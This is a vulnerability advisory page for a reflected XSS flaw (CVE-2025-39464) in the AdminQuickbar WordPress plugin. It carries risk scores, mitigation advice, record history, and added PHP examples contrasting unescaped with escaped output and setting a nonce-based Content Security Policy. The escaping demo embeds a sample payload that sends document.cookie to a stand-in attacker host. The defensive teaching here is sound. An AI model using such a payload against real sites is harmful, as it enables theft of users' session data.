Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rtowebsites AdminQuickbar adminquickbar allows Reflected XSS. This issue affects AdminQuickbar: from n/a through <= 1.9.1.
Published: 2025-04-17
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The AdminQuickbar plugin for WordPress (rtowebsites) fails to neutralize user-controlled input before writing it into page markup, so attacker-supplied script is reflected back to the browser. This reflected Cross-Site Scripting (XSS) flaw, classified as CWE-79, executes arbitrary JavaScript under the WordPress site's origin in the browser of any user who opens a crafted URL that targets the vulnerable page. WordPress marks its authentication cookies HttpOnly, so outright cookie theft is unlikely, but the injected script can still issue authenticated requests on the victim's behalf, deface the page, or redirect the victim to an attacker-controlled site.

Affected Systems

WordPress sites running the rtowebsites AdminQuickbar plugin at version 1.9.1 or earlier are vulnerable. All releases through 1.9.1 lack the necessary output escaping and should be considered at risk until a release the vendor identifies as fixed is deployed; this page records no fixed version.

Risk and Exploitability

The CVSS 3.1 base score of 7.1 (High; vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L) describes a network-reachable flaw that requires no privileges but does require user interaction, with a scope change because the script runs in the victim's browser rather than on the server. The EPSS score below 1% indicates a very low current likelihood of exploitation, the vulnerability is not listed in CISA's KEV catalog, and the SSVC record on this page reports Exploitation: none and Automatable: no. Based on the description, an attacker crafts a URL whose parameter value is reflected unescaped into the plugin's output and must get a victim to open it, for example via a phishing link; since AdminQuickbar operates in the admin area, the intended victim is most plausibly a logged-in WordPress administrator. The attack is therefore targeted rather than mass-exploitable. Note that the page identifies neither the vulnerable parameter nor the reflecting endpoint.

Generated by OpenCVE AI on May 2, 2026 at 02:09 UTC.
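To make the CWE-79 pattern above concrete, here is an added example written for this page; it is not code from the AdminQuickbar plugin or from OpenCVE. It shows a hypothetical admin-bar search field that echoes a request parameter unescaped, beside the same field with context-correct output escaping. The parameter name q, the markup, and the helper names are assumptions, since the advisory names neither the vulnerable parameter nor the endpoint. It uses htmlspecialchars() as a stand-in for WordPress's esc_attr()/esc_html() so that it runs with plain php outside WordPress.

```php
<?php
// Added example for this page; not code from the AdminQuickbar plugin.
// The parameter name 'q', the markup and the helper names are hypothetical.
declare(strict_types=1);

// Constructed attacker input, as it would arrive in ?q=... after URL decoding:
// it closes the value="..." attribute, then injects a script element.
const PAYLOAD = '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>';

// Vulnerable pattern (CWE-79): request data concatenated into HTML unchanged.
function render_search_box_vulnerable(string $q): string
{
    return '<input type="text" name="q" value="' . $q . '">';
}

// Stand-in for WordPress esc_attr(): encode &, <, >, " and ' for an
// attribute-value context. In a real plugin call esc_attr() itself.
function esc_attr_local(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Stand-in for WordPress esc_html(): the same encoding is correct for text
// nodes. URL (esc_url) and JavaScript contexts need different escaping.
function esc_html_local(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: escape at output time, for the context the data lands in.
function render_search_box_safe(string $q): string
{
    return '<input type="text" name="q" value="' . esc_attr_local($q) . '">'
         . '<p>Results for: ' . esc_html_local($q) . '</p>';
}

// Crude check used only to show the difference: is a raw <script start tag
// present in the rendered markup?
function contains_script_tag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Simulate the reflected request. Outside a web server $_GET is empty, so the
// constructed payload is used instead.
$q = $_GET['q'] ?? PAYLOAD;

$vuln = render_search_box_vulnerable($q);
$safe = render_search_box_safe($q);

printf("Vulnerable output: %s\nScript tag present: %s\n\n",
    $vuln, contains_script_tag($vuln) ? 'yes' : 'no');
printf("Hardened output:   %s\nScript tag present: %s\n",
    $safe, contains_script_tag($safe) ? 'yes' : 'no');
```

Run it with `php xss_demo.php`. In a real plugin the WordPress escaping functions are esc_attr() for attribute values, esc_html() for text nodes, esc_url() for href/src and wp_kses_post() where limited HTML is intended; sanitize_text_field() on input is useful but does not replace escaping on output. To verify a patched build, request the reflecting page with a harmless marker such as `"><x-probe>` in the suspect parameter and confirm the response carries it back as `&quot;&gt;&lt;x-probe&gt;` rather than as raw markup.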

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade AdminQuickbar to a release later than 1.9.1 once the vendor publishes one and its changelog or the Patchstack advisory confirms that it fixes this reflected XSS; this page does not record a fixed version.
  • If no fixed release is available, deactivate the plugin. Restricting it to non-public parts of the site does not by itself stop reflected XSS, because the victim (typically a logged-in user) delivers the payload by opening the attacker's link; limiting wp-admin access to trusted IP ranges or a VPN reduces exposure but does not remove it.
  • As defence in depth, add a web application firewall rule that rejects requests whose query string carries script-bearing input (for example <script, javascript: or on*= event handlers), and deploy a Content Security Policy that forbids inline script. WordPress core and many plugins rely on inline scripts in wp-admin, so roll the policy out in Content-Security-Policy-Report-Only mode first and expect to need nonces before enforcing it. Neither control fixes the missing output escaping; they only raise the cost of exploitation.
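The last recommendation names a Content Security Policy. The following is an added example, not code from the page, the plugin or OpenCVE: it places the weak CSP setting beside a hardened nonce-based one and wires the header into WordPress from a must-use plugin. The file location, the function names, the CSP_ENFORCE constant and the /csp-report endpoint are assumptions; the hook and filter names ('send_headers', 'admin_init', 'wp_script_attributes', 'wp_inline_script_attributes') are WordPress core ones, the latter two available since WordPress 5.7.

```php
<?php
// Added example for this page; not part of OpenCVE's text or the plugin.
// Intended for wp-content/mu-plugins/csp.php (the path is an assumption).
declare(strict_types=1);

// Weak policy: 'unsafe-inline' lets a reflected <script> block execute, so it
// gives no protection against the XSS described on this page.
function csp_weak(): string
{
    return "default-src 'self'; script-src 'self' 'unsafe-inline'";
}

// Hardened policy: script runs only from the site's own origin or when the
// <script> tag carries this request's nonce. A reflected payload cannot know
// the nonce, so the browser refuses to run it. object-src and base-uri close
// two common bypass routes.
function csp_hardened(string $nonce, string $report_uri = '/csp-report'): string
{
    return "default-src 'self'; "
         . "script-src 'self' 'nonce-{$nonce}'; "
         . "object-src 'none'; "
         . "base-uri 'self'; "
         . "report-uri {$report_uri}";   // hypothetical collection endpoint
}

// 128 bits from the CSPRNG, base64-encoded so it is valid inside the header.
function csp_nonce(): string
{
    return base64_encode(random_bytes(16));
}

// Header name: start in report-only mode, because WordPress core and many
// plugins still print inline scripts without nonces; switch to enforcing only
// when the reports show the admin area working cleanly.
function csp_header_name(bool $enforce): string
{
    return $enforce ? 'Content-Security-Policy' : 'Content-Security-Policy-Report-Only';
}

// WordPress wiring (skipped when the file is run outside WordPress).
if (function_exists('add_action')) {
    $csp_nonce = csp_nonce();
    $enforce   = defined('CSP_ENFORCE') && CSP_ENFORCE;   // assumed config constant

    $send_csp = static function () use ($csp_nonce, $enforce): void {
        if (!headers_sent()) {
            header(csp_header_name($enforce) . ': ' . csp_hardened($csp_nonce));
        }
    };
    // 'send_headers' fires for front-end requests only; wp-admin requests
    // (where this plugin's UI lives) need 'admin_init' as well.
    add_action('send_headers', $send_csp);
    add_action('admin_init', $send_csp);

    // Tag scripts that WordPress emits through its script API with the nonce.
    $add_nonce = static function (array $attributes) use ($csp_nonce): array {
        $attributes['nonce'] = $csp_nonce;
        return $attributes;
    };
    add_filter('wp_script_attributes', $add_nonce);
    add_filter('wp_inline_script_attributes', $add_nonce);
}
```

Check the deployed header with `curl -sI https://example.test/wp-login.php | grep -i content-security-policy` (hostname is a placeholder). Scripts printed with a bare `<script>` echo rather than through the script API will show up in the reports as violations and must be converted before enforcing. The header is a backstop while a fixed release is awaited; it does not correct the plugin's missing output escaping.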


Advisories

Source: EUVD
ID: EUVD-2025-11787
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rtowebsites AdminQuickbar allows Reflected XSS. This issue affects AdminQuickbar: from n/a through 1.9.1.
History

Thu, 23 Apr 2026 15:00:00 +0000
  Metrics cvssV3_1: {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000
  Description
    Values Removed: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rtowebsites AdminQuickbar allows Reflected XSS. This issue affects AdminQuickbar: from n/a through 1.9.1.
    Values Added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rtowebsites AdminQuickbar adminquickbar allows Reflected XSS.This issue affects AdminQuickbar: from n/a through <= 1.9.1.
  References
  Metrics cvssV3_1: {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Thu, 17 Apr 2025 19:15:00 +0000
  Metrics ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 17 Apr 2025 15:30:00 +0000
  Description (Values Added): Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rtowebsites AdminQuickbar allows Reflected XSS. This issue affects AdminQuickbar: from n/a through 1.9.1.
  Title (Values Added): WordPress AdminQuickbar plugin <= 1.9.1 - Reflected Cross Site Scripting (XSS) vulnerability
  Weaknesses (Values Added): CWE-79
  References
  Metrics cvssV3_1 (Values Added): {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:12:32.031Z

Reserved: 2025-04-16T06:23:36.340Z

Link: CVE-2025-39464

Vulnrichment

Updated: 2025-04-17T18:10:28.559Z

NVD

Status: Deferred

Published: 2025-04-17T16:15:56.103

Modified: 2026-04-23T15:29:36.560

Link: CVE-2025-39464

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-02T02:15:31Z

Weaknesses